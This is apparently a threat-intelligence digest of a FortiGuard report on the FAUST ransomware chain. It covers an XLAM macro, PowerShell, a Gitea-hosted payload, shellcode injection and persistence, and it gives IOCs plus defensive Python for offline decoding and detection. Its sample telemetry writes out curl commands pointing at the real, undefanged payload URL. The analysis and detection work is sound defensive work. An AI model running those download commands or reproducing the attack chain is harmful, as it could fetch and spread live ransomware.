Another Phobos Ransomware Variant Launches Attack – FAUST | FortiGuard Labs

FortiGuard Labs analyzed a Phobos-family campaign that uses an XLAM document with embedded VBA to launch PowerShell, download Base64-encoded payloads from a Gitea repository, and deploy the FAUST ransomware via in-memory shellcode injection. The chain includes a downloader EXE that decodes obfuscated strings, extracts an MSIL loader, injects shellcode into a spawned process, and establishes persistence. #Phobos #FAUST

Keypoints

  • Malicious XLAM document contains a VBA macro that runs PowerShell on Workbook_Open to fetch and decode payload data.
  • Payloads are hosted on Gitea as Base64-encoded files; the script extracts a targeted section with the pattern “DICK{(.*)}DICK” and decodes it to produce executable components.
  • The dropped executable “AVG update.exe” acts as a downloader/loader: it decodes its .rdata to extract an MSIL execution file (“SmartScreen Defender Windows.exe”) and retrieves additional data via curl.
  • The loader decodes Base64 shellcode and performs process injection by allocating RWE memory and using native APIs to write, protect, and create a remote thread in the target process.
  • FAUST ransomware executes, creates persistence via Run registry and startup folder copies, enumerates drives and network shares, excludes specific files/directories, and encrypts files with the “.faust” extension and a victim ID in the filename.
  • Indicators include Gitea-hosted URLs, specific filenames (e.g., AVG update.exe), and multiple file hashes; FortiGuard detections and protections are available.

MITRE Techniques

  • [T1204.002] Malicious File – VBA macro in an XLAM document initiates the attack (‘The XLAM document we discovered contains an embedded VBA script’).
  • [T1059.001] PowerShell – Macro invokes PowerShell to download and decode payload data (‘the script triggers PowerShell for the next stage using the “Workbook_Open()” function.’).
  • [T1105] Ingress Tool Transfer – Payloads are retrieved from a Gitea repository (‘downloads data from hxxps://gitea[.]com/JoinPokingo/JingaPol/raw/branch/main/cfmifs_CRPT[.]txt’).
  • [T1027] Obfuscated Files or Information – Files and strings are Base64-encoded and XOR-obfuscated before use (‘files encoded in Base64’ and ‘encodes all its strings and XORs them with specific hexadecimal keys’).
  • [T1055] Process Injection – Loader allocates RWE memory and injects shellcode using native APIs (‘ZwAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, and RtlCreateUserThread’).
  • [T1547.001] Registry Run Keys / Startup Folder – Malware adds persistence via Run key and copies itself to startup folders (‘adds persistence by adding a registry to “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” and copying itself to two folders…’).
  • [T1486] Data Encrypted for Impact – FAUST encrypts files and appends the “.faust” extension, dropping ransom notes (‘appends the “.faust” extension to each encrypted file and generates info.txt and info.hta’).
  • [T1083] File and Directory Discovery – Ransomware scans logical drives, network shares, and searches for specific database/file types before encryption (‘deploying encryption, scanning logical drives, searching for network/sharing resources, scanning files individually’).

Indicators of Compromise

  • [File Hashes] Malware samples – 426284b7dedb929129687303f1bf7e4def607f404c93f7736d17241e43f0ab33, 50e2cb600471fc38c4245d596f92f5444e7e17cd21dd794ba7d547e0f2d9a9d5, and 3 more hashes.
  • [URLs / Domains] Gitea-hosted payloads – hxxps://gitea[.]com/JoinPokingo/JingaPol/raw/branch/main/cfmifs_CRPT[.]txt, hxxps://gitea[.]com/JoinPokingo/JingaPol/raw/branch/main/AppVStreamingUX_FST[.]txt.
  • [Filenames] Dropped/executed files – AVG update.exe, SmartScreen Defender Windows.exe, info.hta / info.txt (ransom notes).
  • [Email] Ransom contact – [email protected] (used in encrypted filename and ransom note).

The technical chain begins with an XLAM document embedding a VBA macro that executes on Workbook_Open to run a PowerShell script. The PowerShell fetches Base64-encoded blobs from a Gitea repo, extracts the targeted segment using the regex pattern “DICK{(.*)}DICK”, decodes the content, and writes decoded artifacts (a decoy XLSX and an executable named “AVG update.exe”) into a randomly named folder under %APPDATA%/Local.
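The extraction-and-decode step above can be reproduced offline against a captured copy of the Gitea text file, which is how an analyst recovers the dropped artifacts without ever running the macro. The Python below is an added example written for this page, not code from the FortiGuard report or from the malware: the marker pattern is the one the report quotes, while the non-greedy match, the magic-byte table and the sample blob are this example's own assumptions.

```python
import base64
import binascii
import re

# Marker pattern used by the PowerShell stage, as quoted in the FortiGuard write-up.
# The original uses a greedy "(.*)"; a non-greedy match is used here (an assumption
# for this example) so that a blob carrying several wrapped segments yields each one
# separately instead of one span across all of them.
SEGMENT_RE = re.compile(r"DICK\{(.*?)\}DICK", re.DOTALL)

# Magic bytes for the two artifact types the write-up says are dropped:
# a PE executable ("AVG update.exe") and an OOXML decoy (a ZIP container).
MAGIC = {
    b"MZ": "PE executable",
    b"PK\x03\x04": "ZIP/OOXML document",
}


def extract_segments(blob: str) -> list[bytes]:
    """Return the decoded payload of every DICK{...}DICK segment in `blob`.

    Whitespace inside a segment is removed before decoding because Base64 served
    as a text file may have been line-wrapped. Segments that do not decode cleanly
    are skipped rather than raising, so one corrupt segment does not hide the rest.
    """
    out = []
    for seg in SEGMENT_RE.findall(blob):
        compact = re.sub(r"\s+", "", seg)
        try:
            out.append(base64.b64decode(compact, validate=True))
        except (binascii.Error, ValueError):
            continue
    return out


def classify(data: bytes) -> str:
    """Label a recovered artifact by its leading magic bytes."""
    for magic, label in MAGIC.items():
        if data.startswith(magic):
            return label
    return "unknown"


def triage(blob: str) -> list[tuple[str, int]]:
    """(file type, size in bytes) for each recovered artifact, in order of appearance."""
    return [(classify(d), len(d)) for d in extract_segments(blob)]


# Constructed sample blob (not the real Gitea content): filler text around two wrapped
# segments, one with a ZIP-looking header and one with a PE-looking header, plus a
# deliberately malformed third segment.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 26
FAKE_ZIP = b"PK\x03\x04" + b"\x00" * 26 + b"[Content_Types].xml"
SAMPLE_BLOB = (
    "lorem ipsum noise that the script ignores\n"
    "DICK{" + base64.b64encode(FAKE_ZIP).decode() + "}DICK\n"
    "more noise\n"
    "DICK{" + "\n".join(re.findall(".{1,40}", base64.b64encode(FAKE_PE).decode())) + "}DICK\n"
    "DICK{not base64!!}DICK\n"
)

if __name__ == "__main__":
    for kind, size in triage(SAMPLE_BLOB):
        print(f"{kind}: {size} bytes")
```

Running it prints one line per recovered segment; the malformed third segment is skipped rather than aborting the run, and the line-wrapped second segment decodes the same as the unwrapped first one.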

“AVG update.exe” functions as a downloader/loader that unpacks obfuscated data (strings XORed with hex keys), decodes its .rdata to extract an MSIL execution payload saved as “SmartScreen Defender Windows.exe”, and uses cmd/curl to retrieve another Base64 blob (AppVStreamingUX_FST.txt). The loader decodes the shellcode and prepares it for in-memory execution.

The loader injects the decoded shellcode into the spawned MSIL process by allocating Read-Write-Execute memory and invoking native APIs (ZwAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, RtlCreateUserThread) to write and execute the payload. The resulting FAUST payload establishes persistence via Run registry keys and startup-folder copies, enumerates drives and network shares, applies an exclusion list, encrypts target files appending an “.id[<victim ID>-3512].[[email protected]].faust” suffix, and drops ransom notes (info.hta/info.txt).
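The chain described above gives a defender several independent choke points: Excel spawning PowerShell, cmd or curl reaching the Gitea repository, a Run value pointing into AppData\Local, and the FAUST file-naming scheme itself. The Python below is an added example, not detection content from the report or from any vendor: it encodes those checks as rules over a small constructed telemetry sample whose field names, random folder name, victim ID and contact address are invented for the example.

```python
import re
from dataclasses import dataclass

# Encrypted-file naming reported for FAUST: <name>.id[<victim ID>-3512].[<email>].faust
FAUST_NAME_RE = re.compile(r"\.id\[[^\]]+-3512\]\.\[[^\]]+\]\.faust$", re.IGNORECASE)
RANSOM_NOTES = {"info.txt", "info.hta"}
# Gitea repository path from the IOC list (defanged on the page, restored here).
GITEA_IOC = "gitea.com/joinpokingo/jingapol/raw/branch/main/"
DROPPED_NAMES = ("avg update.exe", "smartscreen defender windows.exe")
RUN_KEY = r"hkcu\software\microsoft\windows\currentversion\run"


@dataclass
class Event:
    """One telemetry record; the field names are this example's own, not a vendor schema."""
    kind: str               # "process", "registry" or "file"
    parent: str = ""        # parent image, process events
    image: str = ""         # image, process events
    cmdline: str = ""
    key: str = ""           # registry value path, registry events
    data: str = ""          # registry value data
    path: str = ""          # file path, file events


def detect(ev: Event) -> list[str]:
    """Names of the rules one event trips."""
    hits = []
    if ev.kind == "process":
        parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()
        # T1204.002 -> T1059.001: the XLAM macro launching PowerShell from Excel.
        if parent.endswith("excel.exe") and image.endswith("powershell.exe"):
            hits.append("office_spawns_powershell")
        # T1105: any command line that names the Gitea repository path.
        if GITEA_IOC in cmd:
            hits.append("gitea_ioc_download")
        # Filename IOCs on either side of the parent/child pair.
        if any(image.endswith(n) or parent.endswith(n) for n in DROPPED_NAMES):
            hits.append("known_dropped_filename")
    elif ev.kind == "registry":
        # T1547.001: a Run value whose data points into AppData\Local, where the
        # write-up says the decoded artifacts are placed.
        if ev.key.lower().startswith(RUN_KEY) and "\\appdata\\local\\" in ev.data.lower():
            hits.append("run_key_to_appdata_local")
    elif ev.kind == "file":
        name = ev.path.replace("\\", "/").rsplit("/", 1)[-1]
        # T1486: the FAUST naming scheme, or one of its ransom notes.
        if FAUST_NAME_RE.search(name):
            hits.append("faust_encrypted_file")
        elif name.lower() in RANSOM_NOTES:
            hits.append("faust_ransom_note")
    return hits


def scan(events: list[Event]) -> dict[str, int]:
    """Count how many events tripped each rule across a batch."""
    counts: dict[str, int] = {}
    for ev in events:
        for rule in detect(ev):
            counts[rule] = counts.get(rule, 0) + 1
    return counts


# Constructed telemetry (not from the report): the chain in order, plus one benign event.
# "q8f3k", "C0FFEE01" and the contact address are placeholders invented for this example.
SAMPLE_EVENTS = [
    Event("process", parent=r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
          image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline="powershell.exe -w hidden -c ..."),
    Event("process", parent=r"C:\Users\u\AppData\Local\q8f3k\AVG update.exe",
          image=r"C:\Windows\System32\cmd.exe",
          cmdline="cmd.exe /c curl https://gitea.com/JoinPokingo/JingaPol/raw/branch/main/AppVStreamingUX_FST.txt"),
    Event("process", parent=r"C:\Windows\System32\cmd.exe",
          image=r"C:\Windows\System32\curl.exe",
          cmdline="curl https://gitea.com/JoinPokingo/JingaPol/raw/branch/main/AppVStreamingUX_FST.txt"),
    Event("registry", key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SmartScreen",
          data=r"C:\Users\u\AppData\Local\q8f3k\SmartScreen Defender Windows.exe"),
    Event("file", path=r"C:\Users\u\Documents\q3.xlsx.id[C0FFEE01-3512].[contact@example.invalid].faust"),
    Event("file", path=r"C:\Users\u\Documents\info.hta"),
    Event("process", parent=r"C:\Windows\explorer.exe",
          image=r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
]

if __name__ == "__main__":
    for rule, n in scan(SAMPLE_EVENTS).items():
        print(f"{rule}: {n}")
```

The Run-key rule is deliberately narrowed to value data under AppData\Local, since raw Run-key writes are routine on a workstation; the FAUST filename rule matches the “.id[<victim ID>-3512].[<email>].faust” shape rather than a literal contact address, so it still fires if the operator changes mailboxes.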

Read more: https://feeds.fortinet.com/~/865729472/0/fortinet/blog/threat-research~Another-Phobos-Ransomware-Variant-Launches-Attack-%e2%80%93-FAUST